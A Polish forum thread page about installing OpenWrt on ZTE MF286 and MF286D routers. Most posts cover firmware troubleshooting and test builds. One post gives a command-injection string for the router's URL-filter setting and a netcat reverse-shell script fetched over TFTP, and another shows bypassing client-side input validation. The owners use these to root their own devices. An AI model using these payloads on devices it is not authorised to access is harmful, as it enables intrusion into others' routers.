Nie jesteś zalogowany. Proszę się zalogować lub zarejestrować.
eko.one.pl → Sprzęt / Hardware → ZTE MF286 zmiana FW
Strony Poprzednia 1 … 34 35 36 37 38 … 41 Następna
Zaloguj się lub zarejestruj by napisać odpowiedź
@MiG25: a jak z tą binarką? https://busybox.net/downloads/binaries/ … sybox-mips
@Leo-PL, jest to samo .
To będzie niezły burdel openwrt na mf286 z polskiego rynku.
Ta moja sztuka jest z Tele2 , więc to "ogólnoświatowy" problem.
A tak bogiem a prawdą, to do instalacji OpenWrt nie trzeba telnetd, to będzie dało się opędzić samym skryptem ładowanym po TFTP.
W zasadzie to chciałem jakieś komendy AT powysyłac i zobaczyć odpowiedzi... Ale w sumie z reanimacją tego to bym się zdał na Ciebie 
Może da się ten loader ściągnąć ze spawnego ? Albo może ktoś ma framework dla MF286A ?
Może ma ktoś tam konto i mógłby ściągnąć te FW ? https://easy-firmware.com/tags/download … 20Firmware
Mam nadzieję ,że skoro modem jest w trybie serwisowym , to aktualizując FW modem też się przy okazji postawi.
W MF286D w taki sposób zmieniło mi się oprogramowanie modemu z Play na TIM.... ( tle ,że aktualizowałem żywy router play , modem zmienił oprogramowanie , ale router wtedy nie wstał , trzeba było przywracać mtd8).
Jeżeli nie mylę www to na tej co podałeś nie wystarczy konto tylko trzeba zrobić opłatę już nie pamiętam czy za plik czy za range.
No tak ,stąd się pytam czy może ktoś ma któryś z tych FW.
Próbowałem z fw od mf286 ale przy 2% wywala błąd.
Spróbuję zdumpować po Saharze firmware ze swojego modemu, oraz rozpakować paczkę z firmwarem DNA do 286. Jeżeli tam jest ten sam firmware, to powinno jakoś wejść. Jestem ciekaw na ile to ma szansę się udać na porcie szeregowym ztunelowanym przez Socata przez SSH po dwóch Wireguardach 500km dalej ;-]
Leo-PL napisał/a:@MiG25: a jak z tą binarką? https://busybox.net/downloads/binaries/ … sybox-mips
@Leo-PL, jest to samo .
pawol napisał/a:To będzie niezły burdel openwrt na mf286 z polskiego rynku.
Ta moja sztuka jest z Tele2 , więc to "ogólnoświatowy" problem.
Ech. Będę musiał pokombinować dalej przez konsolę. Sam komunikat znaczy tyle, że któryś syscall przy otwieraniu binarki zwrócił kod błędu ENOENT. Tyle. Który dokładnie? Nie wiadomo.
Oba modele, MF286 i MF286D weszły oficjalnie do repozytorium OpenWrt. Gratulacje dla wszystkich zaangażowanych w tym temacie.
ze jak? ze juz? tak szybko?
Express. Dostawa w sobotę. Płatne ekstra.
@Królik Barrrrdzo dobra robota! ;-)
No to mamy wsparcie. Super, że się udało tak szybko.
EDIT:
@Królik Barrrrdzo dobra robota! ;-)
I vice versa.
na czym stanelo w koncu? trza recznie nodem konfigurowac? da sie z gui?
na czym stanelo w koncu? trza recznie nodem konfigurowac? da sie z gui?
U Cezarego jak zwykle będzie obsłużone od strzała. W czystym jak zwykle nie.
Generalnie modem działa. Jeżeli nie chce działać to ustawiasz proto 3g, uruchamiasz połączenie, zmieniasz uqmi i jest. Jeżeli modem na początku wisi to wystarczy zrobić delay na np. 15s i działa połączenie.
gdzie pociagne buildy cezarego? zmeczony jestem juz tym recznym poprawianiem swiata. Chçe to wrzucic i ma dzialac
Na razie są tu, testowe: https://dl.eko.one.pl/test/, później będą normalnie w repo. Nie używaj ich jeżeli nie chcesz zbawiać świata, bo pewnie jeszcze parę razy będzie to aktualizowane. Np. teraz właśnie kompiluję nowe...
Odnośnie exploita do shella na MF286D, ustaliłem co następuje:
- zte_debug.sh istnieje
- Ustawienie filtra z palca przez "nv set websURLFilters=test&&zte_debug.sh 192.168.32.22 sploit" ściąga i wykonuje exploit
- Filtrowanie stringów w webie przez JSa jest dużo bardziej upierdliwe i jeszcze go nie obszedłem, ale przypadkiem raz udało mi się wprowadzić stringa który to zawierał, tylko wskazywał wtedy na niewłaściwe IP.
- Busybox ściągnięty stąd: https://busybox.net/downloads/binaries/ … box-armv7m i zrenamowany jako telnetd wykonuje się tak jak trzeba, w tym odpalony przez buga w parserze.
- Hasło "admin" nie pasuje - to generuje się co reset do ustawień fabrycznych i nie jest związane z hasłem do weba, które jest na etykiecie na spodzie modemu. Potrzebna jest wersja telnetd która nie sprawdza hasła, lub inny sposób na reverse shell, choćby przy użyciu netcata.
Zostało więc tylko rozgryzienie zabezpieczeń w JSach, albo ich obejście. Bug w parserze NV wciąż tam jest.
Moja wersji softu: Nordic_MF286D_B10
Edit: Jest i sposób na reverse shell, używajacy tego samego busyboxa:
#!/bin/sh
# run nc -l -p 2137 on host on IP 192.168.32.22
tftp -g 192.168.32.22 -l /tmp/nc -r busybox
chmod 777 /tmp/nc
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|/tmp/nc 192.168.32.22 2137 >/tmp/fTeraz tylko ten cholerny javascript 
Następne obrazy testowe z 2022-02-05:
- dla ZTE MF286: https://dl.eko.one.pl/test/zte_mf286/20220205/
- dla ZTE MF286D: https://dl.eko.one.pl/test/zte_mf286d/20220205/
Zmiany to głównie synchronizacja DTSów z aktualnymi źródłami OpenWrt wersji rozwojowej (już tak mogę pisać ), zmieniłem kody w platform.sh dla MF286D na zgodne z tym co jest w commicie do OpenWrt i kilka innych pomniejszych poprawek. Testujcie jak chcecie.
czym sie rozni luci od mifi? nie znam tego zagadnienia mifi
Czytaj: https://eko.one.pl/?p=mifi oraz https://eko.one.pl/?p=easyconfig . Moje prywatne autorskie gui które pisałem dla siebie.
@Leo-PL
Na Nordic_MF286D_B10 kliknąłem prawym > zbadaj na pole w które dodaje się url do filtrowania
Zmieniłem name i maxlength aby wyglądało to w ten sposób
<input type="text" name="ddd" id="addURLFilter" maxlength="332" class="required form-control valid">
Dzięki temu można dodać cokolwiek się chce, zauważyłem że można nawet dodać puste pole.
Po restarcie wciąż urządzenie pamięta to co dodałem jednak nie udało mi się uruchomić telnetu ;(
Też tak sprawdzałem i nie szło uruchomić nic.
@Leo-PL
Na Nordic_MF286D_B10 kliknąłem prawym > zbadaj na pole w które dodaje się url do filtrowania
Zmieniłem name i maxlength aby wyglądało to w ten sposób<input type="text" name="ddd" id="addURLFilter" maxlength="332" class="required form-control valid">
Dzięki temu można dodać cokolwiek się chce, zauważyłem że można nawet dodać puste pole.
Po restarcie wciąż urządzenie pamięta to co dodałem jednak nie udało mi się uruchomić telnetu ;(
Tak. Da się wpisać, sprawdzałem. Ale pod spodem jeszcze jakiś validator to mieli i nie przepuszcza requestu.
Raz udało mi się dodać taki string, ale pewnie przez jakiś wyścig. Wpisanie choć jednego "&" ciągle wyrzuca komunikat nawet po zmianie nazwy pola.
Następne obrazy testowe z 2022-02-05:
- dla ZTE MF286: https://dl.eko.one.pl/test/zte_mf286/20220205/
- dla ZTE MF286D: https://dl.eko.one.pl/test/zte_mf286d/20220205/Zmiany to głównie synchronizacja DTSów z aktualnymi źródłami OpenWrt wersji rozwojowej (już tak mogę pisać
MiFi na MF286D działa....
Pisałeś coś do wyboru bandów przez gui... Jeszcze nie do publikacji ?
MiFi na MF286D działa....
Pisałeś coś do wyboru bandów przez gui... Jeszcze nie do publikacji ?
Na dole menu jest pozycja "Modem", tam to jest. Choć publicznie nie wypchałem tego jeszcze do gita. Odśwież cache przeglądarki albo uruchom w trybie prywatnym jeżeli tego nie widzisz.
Strony Poprzednia 1 … 34 35 36 37 38 … 41 Następna
Zaloguj się lub zarejestruj by napisać odpowiedź
eko.one.pl → Sprzęt / Hardware → ZTE MF286 zmiana FW
Forum oparte o PunBB, wspierane przez Informer Technologies, Inc